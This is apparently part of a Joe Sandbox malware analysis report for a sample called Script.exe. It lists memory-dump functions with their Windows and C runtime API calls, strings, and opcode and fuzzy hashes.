Associated: 00000000.00000002.2395022429.000000006E0D2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2395076661.000000006E121000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0b0000_Script.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: c727e4924d92f25ee70ffe3f214b33c6e3da6418a0dd7244a7ad5a76e5a75e74
Instruction ID: e8fc9b5b5eac8f37166cd7665ca8d1564b1069e70e78803cc26ea534979b5b76
Opcode Fuzzy Hash: c727e4924d92f25ee70ffe3f214b33c6e3da6418a0dd7244a7ad5a76e5a75e74
Instruction Fuzzy Hash: 17210576900108BFCB01DFE4D880EDE7BBEFF19644F1488A6E6059B120EB71EA45DB81

Function 6E0C2330 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 6E0C2367
___except_validate_context_record.LIBVCRUNTIME ref: 6E0C236F
_ValidateLocalCookies.LIBCMT ref: 6E0C23F8
__IsNonwritableInCurrentImage.LIBCMT ref: 6E0C2423
_ValidateLocalCookies.LIBCMT ref: 6E0C2478

Strings

csm, xrefs: 6E0C240D

Memory Dump Source

Source File: 00000000.00000002.2394974273.000000006E0B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E0B0000, based on PE: true

Associated: 00000000.00000002.2394959242.000000006E0B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2395003493.000000006E0CC000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2395022429.000000006E0D2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2395076661.000000006E121000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0b0000_Script.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: a8acafefd57008402f1055db454f4706abc6927eb12b62668bd2a52ede3ef1d8
Instruction ID: d65417fbfad210c5d09bf3e94dd17c1b1fdf88c8a2215b7c6835e787545f1b91
Opcode Fuzzy Hash: a8acafefd57008402f1055db454f4706abc6927eb12b62668bd2a52ede3ef1d8
Instruction Fuzzy Hash: 3B41B234A00619EFCF00DFE8C884B9EBBB5EF45B28F109555E914AB751CB319A46CB92

Function 6E0C59BA Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

Strings

api-ms-, xrefs: 6E0C5A11
ext-ms-, xrefs: 6E0C5A25

Memory Dump Source

Source File: 00000000.00000002.2394974273.000000006E0B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E0B0000, based on PE: true

Associated: 00000000.00000002.2394959242.000000006E0B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2395003493.000000006E0CC000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2395022429.000000006E0D2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2395076661.000000006E121000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0b0000_Script.jbxd

Similarity

API ID:
String ID: api-ms-$ext-ms-
API String ID: 0-537541572
Opcode ID: 9eef1cc0dfc17c16e69de1fd54d503d563d910da90ee9a30901a57864158ec14
Instruction ID: 585ce71f9033a622b1f859d1e8ec9369f1081a57a02155b1c83927cd8039d504
Opcode Fuzzy Hash: 9eef1cc0dfc17c16e69de1fd54d503d563d910da90ee9a30901a57864158ec14
Instruction Fuzzy Hash: 0C21BB3E945611EFDB1186E6CCC5B4E37A8AF06FE4F252550E915AF290D770DD00C5E2

Function 6E0C8C46 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 6E0C8C0E: _free.LIBCMT ref: 6E0C8C33

_free.LIBCMT ref: 6E0C8C94

Part of subcall function 6E0C4493: HeapFree.KERNEL32(00000000,00000000,?,6E0C36CC), ref: 6E0C44A9
Part of subcall function 6E0C4493: GetLastError.KERNEL32(?,?,6E0C36CC), ref: 6E0C44BB

_free.LIBCMT ref: 6E0C8C9F
_free.LIBCMT ref: 6E0C8CAA
_free.LIBCMT ref: 6E0C8CFE
_free.LIBCMT ref: 6E0C8D09
_free.LIBCMT ref: 6E0C8D14
_free.LIBCMT ref: 6E0C8D1F

Memory Dump Source

Source File: 00000000.00000002.2394974273.000000006E0B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E0B0000, based on PE: true

Associated: 00000000.00000002.2394959242.000000006E0B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2395003493.000000006E0CC000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2395022429.000000006E0D2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2395076661.000000006E121000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0b0000_Script.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: df3a62bae5619c0391a4dd73f1ed9280de25fa8ef6cc31c29413405a70c15383
Instruction ID: 81f15b676e7867f2104af762fd3b0bf026dbee426d016c24577e65e02c8d4ca6
Opcode Fuzzy Hash: df3a62bae5619c0391a4dd73f1ed9280de25fa8ef6cc31c29413405a70c15383
Instruction Fuzzy Hash: 85116A71581B04FAD620ABF0CC85FCF779EBF05B44F404C25A299A7050DB34F50597A2

Function 6E0C7D5F Relevance: 9.3, APIs: 6, Instructions: 317fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32(?,00000001,?), ref: 6E0C7DA7
__fassign.LIBCMT ref: 6E0C7F8C
__fassign.LIBCMT ref: 6E0C7FA9
WriteFile.KERNEL32(?,6E0C6543,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6E0C7FF1
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 6E0C8031
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 6E0C80D9

Memory Dump Source

Source File: 00000000.00000002.2394974273.000000006E0B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E0B0000, based on PE: true

Associated: 00000000.00000002.2394959242.000000006E0B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2395003493.000000006E0CC000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2395022429.000000006E0D2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2395076661.000000006E121000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0b0000_Script.jbxd

Similarity

API ID: FileWrite__fassign$ConsoleErrorLastOutput
String ID:
API String ID: 1735259414-0
Opcode ID: 4386426ef435cfdc1701bcbe2a572e8dc20a6d58fe08d5cfe3c9777360fd9385
Instruction ID: 4f3e22fed94d85b140e966911536f36863e3e48529eba98974e35283b13d731c
Opcode Fuzzy Hash: 4386426ef435cfdc1701bcbe2a572e8dc20a6d58fe08d5cfe3c9777360fd9385
Instruction Fuzzy Hash: ADC19F75D042598FDB10CFE8C880AEDFBB5FF09714F28816AE865B7281D631A946CF61

Function 6E0C2807 Relevance: 9.1, APIs: 6, Instructions: 60COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000001,?,6E0C24D5,6E0C1600,6E0C1019,?,6E0C1251,?,00000001,?,?,00000001,?,6E0D1120,0000000C,6E0C134A), ref: 6E0C2815
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 6E0C2823
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 6E0C283C
SetLastError.KERNEL32(00000000,6E0C1251,?,00000001,?,?,00000001,?,6E0D1120,0000000C,6E0C134A,?,00000001,?), ref: 6E0C288E

Memory Dump Source

Source File: 00000000.00000002.2394974273.000000006E0B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E0B0000, based on PE: true

Associated: 00000000.00000002.2394959242.000000006E0B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2395003493.000000006E0CC000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2395022429.000000006E0D2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2395076661.000000006E121000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0b0000_Script.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: a577ff7d154b9e9270f4b7fa5f92d6371df8bdf69d681317100504e2f4731ea6
Instruction ID: 9621592213d30fc32952a08a332edd0e21405572efa55da1e18142416f1e3b94
Opcode Fuzzy Hash: a577ff7d154b9e9270f4b7fa5f92d6371df8bdf69d681317100504e2f4731ea6
Instruction Fuzzy Hash: 9701D83221FF135E9A542DF59C95B8E2A9EDB06FB87201729F52057CE0EF724815A242

Function 6E0C4CFF Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 83COMMON

Download Yara Rule

Strings

C:\Users\user\Desktop\Script.exe, xrefs: 6E0C4D04

Memory Dump Source

Source File: 00000000.00000002.2394974273.000000006E0B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E0B0000, based on PE: true

Associated: 00000000.00000002.2394959242.000000006E0B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2395003493.000000006E0CC000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2395022429.000000006E0D2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2395076661.000000006E121000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0b0000_Script.jbxd

Similarity

API ID:
String ID: C:\Users\user\Desktop\Script.exe
API String ID: 0-3474726233
Opcode ID: f0cf780684a2400db5b22a3b2db744b4b6b52d3420659cdfcc6ee253574ab232
Instruction ID: 1cd30a9e25ce243e8bd698d9f52e7a360d024bf65956676c0bd016b1878efd06
Opcode Fuzzy Hash: f0cf780684a2400db5b22a3b2db744b4b6b52d3420659cdfcc6ee253574ab232
Instruction Fuzzy Hash: B8218E71604205BF9B10AFF59CC0F9E77ADFE01BAC7108A14F9A497594EB30DC528BA2

Function 6E0C2983 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 62COMMONLIBRARYCODE

Download Yara Rule

APIs

FreeLibrary.KERNEL32(00000000,?,?,6E0C2A44,00000000,?,00000001,00000000,?,6E0C2ABB,00000001,FlsFree,6E0CCD3C,FlsFree,00000000), ref: 6E0C2A13

Strings

api-ms-, xrefs: 6E0C29D3

Memory Dump Source

Source File: 00000000.00000002.2394974273.000000006E0B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E0B0000, based on PE: true

Associated: 00000000.00000002.2394959242.000000006E0B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2395003493.000000006E0CC000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2395022429.000000006E0D2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2395076661.000000006E121000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0b0000_Script.jbxd

Similarity

API ID: FreeLibrary
String ID: api-ms-
API String ID: 3664257935-2084034818
Opcode ID: d6cd51a1957a721a22ab43f04198a7922a8cf9b455c840eae0bbdbd536df22b8
Instruction ID: 26b46fb3d63559e76b25dc20a82210a1413021a59c28e1fbf82a79e996b096c4
Opcode Fuzzy Hash: d6cd51a1957a721a22ab43f04198a7922a8cf9b455c840eae0bbdbd536df22b8
Instruction Fuzzy Hash: 9211CA32A41E229BDB618AE8CC8474D37E4AF06FB0F251611E911FB6C4D770E900C6D3

Function 6E0C303A Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 30libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,6E0C2FEC,?,?,6E0C2FB4,?,00000001,?), ref: 6E0C304F
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6E0C3062
FreeLibrary.KERNEL32(00000000,?,?,6E0C2FEC,?,?,6E0C2FB4,?,00000001,?), ref: 6E0C3085

Strings

CorExitProcess, xrefs: 6E0C305A
mscoree.dll, xrefs: 6E0C3048

Memory Dump Source

Source File: 00000000.00000002.2394974273.000000006E0B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E0B0000, based on PE: true

Associated: 00000000.00000002.2394959242.000000006E0B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2395003493.000000006E0CC000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2395022429.000000006E0D2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2395076661.000000006E121000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0b0000_Script.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: c0694528d7ef132193062e77a4c2666951f0256baec232d8e82ef5c7098edf39
Instruction ID: e7a2a87b252fe8d373f1919a124d3f474978f5c1d3be5da6815385fd55ea9bc1
Opcode Fuzzy Hash: c0694528d7ef132193062e77a4c2666951f0256baec232d8e82ef5c7098edf39
Instruction Fuzzy Hash: 88F0A732900519FBDF119BD1CC6DB9E7FB9EB06F55F200060F404AA150CB348E00DB92

Function 6E0C7657 Relevance: 7.7, APIs: 5, Instructions: 199COMMON

Download Yara Rule

APIs

__alloca_probe_16.LIBCMT ref: 6E0C76DB
__alloca_probe_16.LIBCMT ref: 6E0C77A1
__freea.LIBCMT ref: 6E0C780D

Part of subcall function 6E0C680C: HeapAlloc.KERNEL32(00000000,6E0C6543,6E0C6543,?,6E0C5243,00000220,?,6E0C6543,?,?,?,?,6E0C8661,00000001,?,?), ref: 6E0C683E

__freea.LIBCMT ref: 6E0C7816
__freea.LIBCMT ref: 6E0C7839

Memory Dump Source

Source File: 00000000.00000002.2394974273.000000006E0B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E0B0000, based on PE: true

Associated: 00000000.00000002.2394959242.000000006E0B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2395003493.000000006E0CC000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2395022429.000000006E0D2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2395076661.000000006E121000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0b0000_Script.jbxd

Similarity

API ID: __freea$__alloca_probe_16$AllocHeap
String ID:
API String ID: 1096550386-0
Opcode ID: 1d54eaf6a8e1381d27e549b386f1eb41cf1b9d50e4807573ea55571423da3c92
Instruction ID: a0617d5c71b851a56b34590ea7171de94efb168f4edb353e01b0041f075c21f1
Opcode Fuzzy Hash: 1d54eaf6a8e1381d27e549b386f1eb41cf1b9d50e4807573ea55571423da3c92
Instruction Fuzzy Hash: A651A07255020BAFEB114EF4CC40FAF36A9EB45F94F294628F914A7190E730DC55C7A2

Function 6E0C8BA5 Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 6E0C8BBD

Part of subcall function 6E0C4493: HeapFree.KERNEL32(00000000,00000000,?,6E0C36CC), ref: 6E0C44A9
Part of subcall function 6E0C4493: GetLastError.KERNEL32(?,?,6E0C36CC), ref: 6E0C44BB

_free.LIBCMT ref: 6E0C8BCF
_free.LIBCMT ref: 6E0C8BE1
_free.LIBCMT ref: 6E0C8BF3
_free.LIBCMT ref: 6E0C8C05

Memory Dump Source

Source File: 00000000.00000002.2394974273.000000006E0B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E0B0000, based on PE: true

Associated: 00000000.00000002.2394959242.000000006E0B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2395003493.000000006E0CC000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2395022429.000000006E0D2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2395076661.000000006E121000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0b0000_Script.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: bee3d8aa8748b85bd2cad431ddc7f782d34971028dea822443ab79bb27172c00
Instruction ID: 9af4013e8efc963428bc2d7a4382e30a5563f4428cb947c9bfd3e6a8fc02de58
Opcode Fuzzy Hash: bee3d8aa8748b85bd2cad431ddc7f782d34971028dea822443ab79bb27172c00
Instruction Fuzzy Hash: 9FF03C71404A05BB8A90CAD8E595E9F33DEBF0AA607748C05F129D7900CB30F9805AAA

Function 6E0C4683 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 206COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 6E0C481D

Strings

*?, xrefs: 6E0C46C6

Memory Dump Source

Source File: 00000000.00000002.2394974273.000000006E0B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E0B0000, based on PE: true

Associated: 00000000.00000002.2394959242.000000006E0B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2395003493.000000006E0CC000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2395022429.000000006E0D2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2395076661.000000006E121000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0b0000_Script.jbxd

Similarity

API ID: _free
String ID: *?
API String ID: 269201875-2564092906
Opcode ID: 94637f4be4f3376c3c73e86559238b3eb3b83d9d35241fd0efc8265dbc0da022
Instruction ID: 75908e67ef142ec28a78f7d2ec36fb447468cee3aa0f1e6716361162af0bd7e8
Opcode Fuzzy Hash: 94637f4be4f3376c3c73e86559238b3eb3b83d9d35241fd0efc8265dbc0da022
Instruction Fuzzy Hash: BA615B75E00219AFDB14CFE8C880AEDFBF9FF49754B24816AD814E7304D7719A428B91

Function 6E0C4597 Relevance: 6.1, APIs: 4, Instructions: 86COMMON

Download Yara Rule

APIs

Part of subcall function 6E0C4BB9: _free.LIBCMT ref: 6E0C4BC7

Part of subcall function 6E0C578D: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,00000000,00000000,?,6E0C7803,?,00000000,00000000), ref: 6E0C5839

GetLastError.KERNEL32 ref: 6E0C45FF
__dosmaperr.LIBCMT ref: 6E0C4606
GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 6E0C4645
__dosmaperr.LIBCMT ref: 6E0C464C

Memory Dump Source

Source File: 00000000.00000002.2394974273.000000006E0B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E0B0000, based on PE: true

Associated: 00000000.00000002.2394959242.000000006E0B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2395003493.000000006E0CC000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2395022429.000000006E0D2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2395076661.000000006E121000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0b0000_Script.jbxd

Similarity

API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
String ID:
API String ID: 167067550-0
Opcode ID: 4dbdc9e64f597ddd7087fd262375458b72436caacffdb008af0ec365c07034f8
Instruction ID: c7f99d597983cdced6c82cd635c553bf2affff413ec2dd0a742ae02f3076a12a
Opcode Fuzzy Hash: 4dbdc9e64f597ddd7087fd262375458b72436caacffdb008af0ec365c07034f8
Instruction Fuzzy Hash: E921AE71604206BF9B109FE58880F9EB7BDFE41BA87108918F924D7144D730EC528BA2

Function 6E0C3E97 Relevance: 6.1, APIs: 4, Instructions: 72COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,6E0C81A7,?,00000001,6E0C65B4,?,6E0C8661,00000001,?,?,?,6E0C6543,?,00000000), ref: 6E0C3E9C
_free.LIBCMT ref: 6E0C3EF9
_free.LIBCMT ref: 6E0C3F2F
SetLastError.KERNEL32(00000000,00000013,000000FF,?,6E0C8661,00000001,?,?,?,6E0C6543,?,00000000,00000000,6E0D1360,0000002C,6E0C65B4), ref: 6E0C3F3A

Memory Dump Source

Source File: 00000000.00000002.2394974273.000000006E0B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E0B0000, based on PE: true

Associated: 00000000.00000002.2394959242.000000006E0B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2395003493.000000006E0CC000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2395022429.000000006E0D2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2395076661.000000006E121000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0b0000_Script.jbxd

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: bb58acf98c1d071f51dcf5de44dc0c3365d5832baeda67f0325763cddc13929d
Instruction ID: 905bebbce091e8c7dd7505217c428cca3ebfc7bf5a237149ad4eb524a7085024
Opcode Fuzzy Hash: bb58acf98c1d071f51dcf5de44dc0c3365d5832baeda67f0325763cddc13929d
Instruction Fuzzy Hash: 9F110A392245016ED74116F54CCDF9F26AEEBCEFB9B240E64F124975C4EF7588025213

Function 6E0C3FEE Relevance: 6.1, APIs: 4, Instructions: 69COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00000001,6E0C4428,6E0C44B9,?,?,6E0C36CC), ref: 6E0C3FF3
_free.LIBCMT ref: 6E0C4050
_free.LIBCMT ref: 6E0C4086
SetLastError.KERNEL32(00000000,00000013,000000FF,?,00000001,6E0C4428,6E0C44B9,?,?,6E0C36CC), ref: 6E0C4091

Memory Dump Source

Source File: 00000000.00000002.2394974273.000000006E0B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E0B0000, based on PE: true

Associated: 00000000.00000002.2394959242.000000006E0B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2395003493.000000006E0CC000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2395022429.000000006E0D2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2395076661.000000006E121000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0b0000_Script.jbxd

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: 912197465d1e47a80620725bd3a290066cb4d672ce4e4e60a0a06de00d36dc69
Instruction ID: 4128fdc67a5eed369eb9a2a5c96cdb2f6a45419d9160f31050ca82c84c52c069
Opcode Fuzzy Hash: 912197465d1e47a80620725bd3a290066cb4d672ce4e4e60a0a06de00d36dc69
Instruction Fuzzy Hash: 6E11A03A248A017E9B1116F98D85B9F269EFB86FB9B750A24F524975C0EE728C025122

Function 6E0C93F6 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,?,6E0C8E50,?,00000001,?,00000001,?,6E0C8136,?,?,00000001), ref: 6E0C940D
GetLastError.KERNEL32(?,6E0C8E50,?,00000001,?,00000001,?,6E0C8136,?,?,00000001,?,00000001,?,6E0C8682,6E0C6543), ref: 6E0C9419

Part of subcall function 6E0C93DF: CloseHandle.KERNEL32(FFFFFFFE,6E0C9429,?,6E0C8E50,?,00000001,?,00000001,?,6E0C8136,?,?,00000001,?,00000001), ref: 6E0C93EF

___initconout.LIBCMT ref: 6E0C9429

Part of subcall function 6E0C93A1: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,6E0C93D0,6E0C8E3D,00000001,?,6E0C8136,?,?,00000001,?), ref: 6E0C93B4

WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,6E0C8E50,?,00000001,?,00000001,?,6E0C8136,?,?,00000001,?), ref: 6E0C943E

Memory Dump Source

Source File: 00000000.00000002.2394974273.000000006E0B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E0B0000, based on PE: true

Associated: 00000000.00000002.2394959242.000000006E0B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2395003493.000000006E0CC000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2395022429.000000006E0D2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2395076661.000000006E121000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0b0000_Script.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: d33cd26767cf3946fcffbd20e74c84091c4b57dec81404f534d125192459a89e
Instruction ID: 1695af691b996e521bdbb9d2e80376ff448d6dd461b99c6962f0593e1bedf51a
Opcode Fuzzy Hash: d33cd26767cf3946fcffbd20e74c84091c4b57dec81404f534d125192459a89e
Instruction Fuzzy Hash: 80F01C36010555BBCF121FD5CC49BCD3F66EF09BE4B514010FA2896520C7328820EB92

Function 6E0C37C4 Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 6E0C37CD

Part of subcall function 6E0C4493: HeapFree.KERNEL32(00000000,00000000,?,6E0C36CC), ref: 6E0C44A9
Part of subcall function 6E0C4493: GetLastError.KERNEL32(?,?,6E0C36CC), ref: 6E0C44BB

_free.LIBCMT ref: 6E0C37E0
_free.LIBCMT ref: 6E0C37F1
_free.LIBCMT ref: 6E0C3802

Memory Dump Source

Source File: 00000000.00000002.2394974273.000000006E0B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E0B0000, based on PE: true

Associated: 00000000.00000002.2394959242.000000006E0B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2395003493.000000006E0CC000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2395022429.000000006E0D2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2395076661.000000006E121000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0b0000_Script.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 0d20653df8a8eb9f36bd63b6c5fc3d6c099eedf20810d7c4b86212da95cfb1c6
Instruction ID: 3c2e2455abe3d772f1eea3915690e32c2d1a915d414be6e39f8eb15447cf2153
Opcode Fuzzy Hash: 0d20653df8a8eb9f36bd63b6c5fc3d6c099eedf20810d7c4b86212da95cfb1c6
Instruction Fuzzy Hash: C7E01A74410E20BA9E511F509E0189E3A2BFB1FA64326C916E41C0AA14E7350593BF9E

Function 6E0C30C8 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 123COMMON

Download Yara Rule

Strings

C:\Users\user\Desktop\Script.exe, xrefs: 6E0C310B, 6E0C3112, 6E0C3148

Memory Dump Source

Source File: 00000000.00000002.2394974273.000000006E0B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E0B0000, based on PE: true

Associated: 00000000.00000002.2394959242.000000006E0B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2395003493.000000006E0CC000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2395022429.000000006E0D2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2395076661.000000006E121000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0b0000_Script.jbxd

Similarity

API ID:
String ID: C:\Users\user\Desktop\Script.exe
API String ID: 0-3474726233
Opcode ID: d76144e604a5a10699ce304b8b0929c26fcacdec8c2b5074cd325933829cbd7b
Instruction ID: 3056ff323a30a77d8a275bdc355cb95695d992a774037f69ff4cc15de2ae76aa
Opcode Fuzzy Hash: d76144e604a5a10699ce304b8b0929c26fcacdec8c2b5074cd325933829cbd7b
Instruction Fuzzy Hash: 3241A071A14619FFDB11CBD9C885ADEBBFDEF8EB10B2044A6E814D7200D7748A419B92

Function 009C64D0 Relevance: 5.1, Strings: 4, Instructions: 92COMMON

Download Yara Rule

Strings

P(@, xrefs: 009C6551
`(@, xrefs: 009C6566
(@, xrefs: 009C6546
(@, xrefs: 009C653F

Memory Dump Source

Source File: 00000000.00000002.2391245033.00000000009A2000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true

